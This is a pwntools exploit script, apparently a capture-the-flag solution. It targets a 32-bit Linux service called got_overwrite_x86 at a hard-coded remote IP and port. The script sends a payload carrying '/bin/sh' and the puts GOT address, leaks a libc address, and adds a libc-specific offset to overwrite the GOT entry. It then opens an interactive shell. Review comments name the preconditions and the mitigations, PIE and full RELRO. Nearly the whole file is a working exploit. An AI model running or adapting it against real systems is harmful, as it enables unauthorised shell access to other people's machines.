from pwn import *
# Exploit script for a 32-bit Linux target (the disabled line below names the
# binary got_overwrite_x86). Flow visible here: send one payload that ends in
# the packed value of puts_got, read back a 4-byte value the service prints,
# add a libc-specific offset to it, and send the sum as a packed 32-bit word.
#
# NOTE(review): a hard-coded GOT address only holds for a non-PIE binary, and
# the technique the binary is named after needs a writable GOT. Building the
# target with PIE and full RELRO (-pie -Wl,-z,relro,-z,now) removes both
# preconditions.

# Local run against the binary instead of the remote service (disabled by the author):
# p = process('./got_overwrite_x86')
p = remote('106.55.152.166', 38085)

context(log_level='debug', arch='i386', os='linux')

# Fixed address used as the last 4 bytes of the payload.
# Presumably the GOT slot of puts in the target — verify against the binary.
puts_got = 0x0804a01c

# Offset added to the leaked value. The author ties it to one libc build:
# libc6-i386_2.27-3ubuntu1.4_amd64. Any other libc needs a different constant.
# Which two symbols it spans cannot be confirmed from this script.
sys2libcmain = 0x23fe0

# Payload layout (28 bytes): NUL-terminated "/bin/sh" (8), filler (16),
# then puts_got packed as a 32-bit word (4).
# NOTE(review): how the target consumes these bytes is not visible here.
first_stage = b"".join([b"/bin/sh", b'\x00', b'a' * 16, p32(puts_got)])
p.sendafter("Now Playing: Simple Minds (Breakfast)\n", first_stage)

# Skip output up to the first '(' and keep bytes 4..7 of what follows.
# NOTE(review): recv(8) returns at most 8 bytes; the slice assumes all
# eight arrived in a single read.
p.recvuntil('(')
leaked = p.recv(8)[4:]

# Decode the leaked bytes as a little-endian integer, echoing each byte value.
addr = 0
for position, byte_value in enumerate(leaked):
    print(byte_value)
    addr += byte_value * (256 ** position)

# Apply the libc offset and send the result back as 4 packed bytes.
addr = addr + sys2libcmain
p.send(p32(addr))
p.interactive()
